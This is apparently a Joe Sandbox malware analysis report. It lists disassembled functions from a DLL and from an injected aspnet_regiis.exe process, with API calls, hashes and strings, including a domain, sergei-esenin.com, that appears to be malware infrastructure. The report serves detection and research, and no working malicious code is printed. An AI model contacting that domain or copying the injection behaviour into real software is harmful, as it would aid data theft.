GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EFD9974B,00000000,?,00000000,6CF6C252,000000FF,?,6CF63D8F,?,?,6CF63D63,?), ref: 6CF63E2A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CF63E3C
FreeLibrary.KERNEL32(00000000,?,00000000,6CF6C252,000000FF,?,6CF63D8F,?,?,6CF63D63,?), ref: 6CF63E5E

Strings

CorExitProcess, xrefs: 6CF63E34
mscoree.dll, xrefs: 6CF63E23

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 899d046d767860cff087696e4d689415abfc626606c07106151011acc11022ec
Instruction ID: eb0d01bfe031469b60d5105e58ee9803d24a26d3d4f6d8e5b46182003c6cccc1
Opcode Fuzzy Hash: 899d046d767860cff087696e4d689415abfc626606c07106151011acc11022ec
Instruction Fuzzy Hash: 2A01A272A14619ABDF019F52CC08BBFBBB8FB09714F100525F922A3AC0DB759904CB90

Function 6CF68674 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CF686F9
__alloca_probe_16.LIBCMT ref: 6CF687C2
__freea.LIBCMT ref: 6CF68829

Part of subcall function 6CF65062: RtlAllocateHeap.NTDLL(00000000,6CF6606C,?,?,6CF6606C,00000220,?,00000000,?), ref: 6CF65094

__freea.LIBCMT ref: 6CF6883C
__freea.LIBCMT ref: 6CF68849

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 9c5863fe572f9d1edfb6d49e70833e48bee210d8be4dbc99e53069385d051d9d
Instruction ID: 818d3c4d9edd62f72dd19442fa3a4b015ce552820be785a4844bc0c167fbc5a6
Opcode Fuzzy Hash: 9c5863fe572f9d1edfb6d49e70833e48bee210d8be4dbc99e53069385d051d9d
Instruction Fuzzy Hash: 1E519572601206ABEB118E76CC80DEB3AA9EF46758B25052EFD14E7F40EB31DC54C7A0

Function 6CF62522 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CF624D3,00000000,?,00000001,?,?,?,6CF625C2,00000001,FlsFree,6CF6E768,FlsFree), ref: 6CF6252F
GetLastError.KERNEL32(?,6CF624D3,00000000,?,00000001,?,?,?,6CF625C2,00000001,FlsFree,6CF6E768,FlsFree,00000000,?,6CF62021), ref: 6CF62539
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CF62561

Strings

api-ms-, xrefs: 6CF62546

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 219f126bdb613e42dd1ef43e734c370a3fb41f7b8d2cb6f202db1a3320e4714b
Instruction ID: 170f6e8a9fe358214928b6e6c2893fe32a9955018a0c60fa05a01c3e2d68b562
Opcode Fuzzy Hash: 219f126bdb613e42dd1ef43e734c370a3fb41f7b8d2cb6f202db1a3320e4714b
Instruction Fuzzy Hash: 36E04F31B48204B7EF105F63DC09B583E65BB01B48F244020F95CE8CA5E762D911A684

Function 6CF68D81 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(EFD9974B,00000000,00000000,?), ref: 6CF68DE4

Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CF69036
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CF6907C
GetLastError.KERNEL32 ref: 6CF6911F

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 7fdd1d2097b2824a0a9c54db8409702883f9d09ea1cda8e30d65d2c8d3b663ae
Instruction ID: bfc708280e82ccf5cedeea9e43cb41436047795351295ef5445c52189f21b841
Opcode Fuzzy Hash: 7fdd1d2097b2824a0a9c54db8409702883f9d09ea1cda8e30d65d2c8d3b663ae
Instruction Fuzzy Hash: 50D17D75E04248AFCF05CFA9C880ADEBBB5FF09314F25416AE465EBB41DB31AA45CB50

Function 6CF626A3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CF6276A
___AdjustPointer.LIBCMT ref: 6CF6278D
___AdjustPointer.LIBCMT ref: 6CF62829

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 10bd9e1fdcf812b38dd44a5350ec30ca5b61a24e4582ab878202629ba6ed0997
Instruction ID: a41af311b2c4e60c2711d3d3587237bec6a7fa9c9c50627299dd377deebe382c
Opcode Fuzzy Hash: 10bd9e1fdcf812b38dd44a5350ec30ca5b61a24e4582ab878202629ba6ed0997
Instruction Fuzzy Hash: FA51E472A052069FEB158F16D948FAAB7B4FF04318F20462ED81597E90EB33E884C790

Function 6CF6530D Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722

GetLastError.KERNEL32 ref: 6CF65371
__dosmaperr.LIBCMT ref: 6CF65378
GetLastError.KERNEL32(?,?,?,?), ref: 6CF653B2
__dosmaperr.LIBCMT ref: 6CF653B9

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 24eef70d8f2a70468f66eb454b7813a54ef6ccf4ca29ca3fb88990543b6da0f5
Instruction ID: 91a357a01591c88f5a4b81d41cfed6ee3b10e47243ec20af9ec11bef158049ed
Opcode Fuzzy Hash: 24eef70d8f2a70468f66eb454b7813a54ef6ccf4ca29ca3fb88990543b6da0f5
Instruction Fuzzy Hash: A121C571604309AFD7009F67888195BB7BAEF0576C7248618F829A7E12D770EC448BA0

Function 6CF6A486 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000), ref: 6CF6A49D
GetLastError.KERNEL32(?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?,?,?,6CF69716,00000000), ref: 6CF6A4A9

Part of subcall function 6CF6A46F: CloseHandle.KERNEL32(FFFFFFFE,6CF6A4B9,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?,?), ref: 6CF6A47F

___initconout.LIBCMT ref: 6CF6A4B9

Part of subcall function 6CF6A431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF6A460,6CF69C32,?,?,6CF69173,?,00000000,00000000,?), ref: 6CF6A444

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?), ref: 6CF6A4CE

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 49fcb4d04753638bda793b71dee855a52680a53ad1eabfe5cce63c7a1b0fef42
Instruction ID: d63a605951ee78970d59b9683db6baac2918f0bddb0f30265465260931b94c06
Opcode Fuzzy Hash: 49fcb4d04753638bda793b71dee855a52680a53ad1eabfe5cce63c7a1b0fef42
Instruction Fuzzy Hash: 29F0C036A10124BBCF521F97CC08A9A7FB6FF093A5B154510FA6896924D732C920EB94

Function 6CF619A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6CF619DF
__IsNonwritableInCurrentImage.LIBCMT ref: 6CF61A93

Strings

csm, xrefs: 6CF61A7D

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 0655c44510020d56c77d69d29f2e25d2e7514c0e878528e4c9c849381f0c5617
Instruction ID: 2f3625cefa6aa61bb1dacfc4a9afe5a50db093cfb28cb612a4e3fd111446a6f4
Opcode Fuzzy Hash: 0655c44510020d56c77d69d29f2e25d2e7514c0e878528e4c9c849381f0c5617
Instruction Fuzzy Hash: 66419335A002099FCF04DF6AC880ADE7BB5AF4631CF14C155E8259BF91D732EA19CB91

Function 6CF62C9F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6CF62CC4

Strings

RCC, xrefs: 6CF62CDE
MOC, xrefs: 6CF62CD6

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 863b73af5dc08a3e5c37e91420a9c043ba40a5c9b7216e30460faf2e39c54f6c
Instruction ID: 03078a5a0b9ecb8894b363f9f6b088ee74da4f489675817e1d8568705d66ee5e
Opcode Fuzzy Hash: 863b73af5dc08a3e5c37e91420a9c043ba40a5c9b7216e30460faf2e39c54f6c
Instruction Fuzzy Hash: 3B416871A00209AFCF01CF95CC84BEEBBB5FF48308F248159F91467A65D3369951DB51

Analysis Process: aspnet_regiis.exePID: 280, Parent PID: 3652COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	62.4%
Total number of Nodes:	101
Total number of Limit Nodes:	8

Executed Functions

Function 0058A429 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 604
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(C965CB65), ref: 0058A483
SysAllocString.OLEAUT32(73BF71A3), ref: 0058A547
VariantInit.OLEAUT32(?), ref: 0058A5C5
VariantInit.OLEAUT32(?), ref: 0058A675
VariantClear.OLEAUT32(?), ref: 0058A811
VariantClear.OLEAUT32(?), ref: 0058A831
SysFreeString.OLEAUT32(?), ref: 0058A855
SysFreeString.OLEAUT32(?), ref: 0058A866
SysFreeString.OLEAUT32(?), ref: 0058A871
SysFreeString.OLEAUT32(?), ref: 0058A892
SysFreeString.OLEAUT32(?), ref: 0058A8B1
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0058A8F7

Strings

!, xrefs: 0058A4ED
IK, xrefs: 0058A693

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: String$Free$Variant$AllocClearInit$InformationVolume
String ID: !$IK
API String ID: 3953524707-496506819
Opcode ID: badd5c4f4b37c9f170a5082b93f9fe3ed8c42ece6719f743e135e5b138f8647f
Instruction ID: 20373eb07a309dc9746e0df4f655e497e21b10da3e070e29758b1474129be8ae
Opcode Fuzzy Hash: badd5c4f4b37c9f170a5082b93f9fe3ed8c42ece6719f743e135e5b138f8647f
Instruction Fuzzy Hash: AC121071A18301DFE704DF64D88576FBBB5FB99304F16882EE98697290D738D809CB92

Function 00560B70 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00560C71
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00560C93
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00560FE1

Strings

=g, xrefs: 00560ECE
n&b, xrefs: 00560CD0
0C3119F82F2B722B2A3117AA92805AE5, xrefs: 00560CA9
vr, xrefs: 00560ED5
}t, xrefs: 00560EDC
~{, xrefs: 00560EC7
sergei-esenin.com, xrefs: 00560F9B

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: Initialize$DirectorySecuritySystem
String ID: 0C3119F82F2B722B2A3117AA92805AE5$=g$n&b$sergei-esenin.com$vr$}t$~{
API String ID: 1379780170-2408420023
Opcode ID: 00825fc6e70f1ba971df853555e0c2e6070b2d4f8916177cb7c8b82034e215f8
Instruction ID: 2d25386a4b3785857f3fc326965241e2d17b57c197d6b4bab9e9d511e1162e49
Opcode Fuzzy Hash: 00825fc6e70f1ba971df853555e0c2e6070b2d4f8916177cb7c8b82034e215f8
Instruction Fuzzy Hash: 74D1BFB09107409FD7209F39C896B56BFF0FB56310F1446ADE8D68F696E3359809CB92

Function 0055CE80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,61F667F5,005973DA,?,00000000,00000005), ref: 0055D069
GetCurrentThreadId.KERNEL32 ref: 0055D078
GetInputState.USER32 ref: 0055D07E
GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0055D088
ExitProcess.KERNEL32 ref: 0055D0A8

Strings

\_, xrefs: 0055D019

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExecuteExitInputShellStateThread
String ID: \_
API String ID: 288744916-2885897410
Opcode ID: 2c81bdfdd7e56bf7c21de24d5dac7be5c1014d4182496115060d8a9e6c07c834
Instruction ID: 5377b241ffa1c05049fbaef30f8f9386e1e29f35a43a901905bcaefac632aaf2
Opcode Fuzzy Hash: 2c81bdfdd7e56bf7c21de24d5dac7be5c1014d4182496115060d8a9e6c07c834
Instruction Fuzzy Hash: 4A5159326593014BD718AF359D2A36F7FD2EFC1314F19C52DE4829B2D1E678880A8B96

Function 005909FC Relevance: 3.9, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[e\c, xrefs: 00590A24
t}Z, xrefs: 00590C8B
@, xrefs: 00590CE9

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: @$[e\c$t}Z
API String ID: 0-3149312526
Opcode ID: f4a1e0e522de8a1a4085f393c9a65e58d3988404a65b6e0dd7983f4d9ccdd91f
Instruction ID: 6d68472da6f87c8f5921587e2da9de42e47ebafd070422d46986e93a76625d6f
Opcode Fuzzy Hash: f4a1e0e522de8a1a4085f393c9a65e58d3988404a65b6e0dd7983f4d9ccdd91f
Instruction Fuzzy Hash: 0F419D705183428FDB14DF28C45167BBBE1FFD5308F18691DE0869B291DB348946CB8A

Function 0058A260 Relevance: 1.6, APIs: 1, Instructions: 70
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00596B30,00000000,00000001,00596B20,00000000), ref: 0058A35D

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 77ddc0e0126c9a901999dc1692095873b7a4995789f55eabd908d6ee195275be
Instruction ID: 4341d8b85b67559c6ee3d4882bf48131b6526dfae031502e647209f5d8c938e8
Opcode Fuzzy Hash: 77ddc0e0126c9a901999dc1692095873b7a4995789f55eabd908d6ee195275be
Instruction Fuzzy Hash: 4521B6B1158300AFE320CF24E844B5BBBE4FBD6744F00890DF1D85A280DBB58508CB92

Function 00590730 Relevance: 1.6, APIs: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?), ref: 005907C2

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 706e5e5846650cf2ca6f212dc39787022f5467f79a6f6a9bbc7c38991383e79a
Instruction ID: 6d434d5750023a91209064a43987b452cde3111f9a6ee521175c4333dcc6582a
Opcode Fuzzy Hash: 706e5e5846650cf2ca6f212dc39787022f5467f79a6f6a9bbc7c38991383e79a
Instruction Fuzzy Hash: 55119C3275D3058BE3145A78ACD262FBBAAFBD5214F1D453CE880936C0D175A80553E1

Function 005907F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00593C9A,005C003F,00000006,?,?,00000018,?,?,?), ref: 0059081E

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00590A8B Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

MJKH, xrefs: 00590AF4

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: MJKH
API String ID: 2994545307-1589446790
Opcode ID: 70a5d042af1a801f2c2c5a1c5e96a414b94af2eba03ab2ff1993e2ab159f96a5
Instruction ID: 5f2591c5ac06be1f9af4290161c27fd8ee8821696a9126e3c8551a663e6f608d
Opcode Fuzzy Hash: 70a5d042af1a801f2c2c5a1c5e96a414b94af2eba03ab2ff1993e2ab159f96a5
Instruction Fuzzy Hash: 133124303483539FEB24CB18CC5962A7B93FBC531AF298929E052E72D4DF309456DB89

Function 0059162C Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa3dbbb902979361623085a8d6bf3a4f5a808abbed0425b5531a8f69f9c78ee
Instruction ID: 7ed4fdcbb296056bb7841900e1c309849e54f625e24456734847dee974b948f4
Opcode Fuzzy Hash: bfa3dbbb902979361623085a8d6bf3a4f5a808abbed0425b5531a8f69f9c78ee
Instruction Fuzzy Hash: 720239366087518FCB18CF28D891129BBE1FB9A314F0A8A7ED896C7391D734E945DB81

Function 00590DDC Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
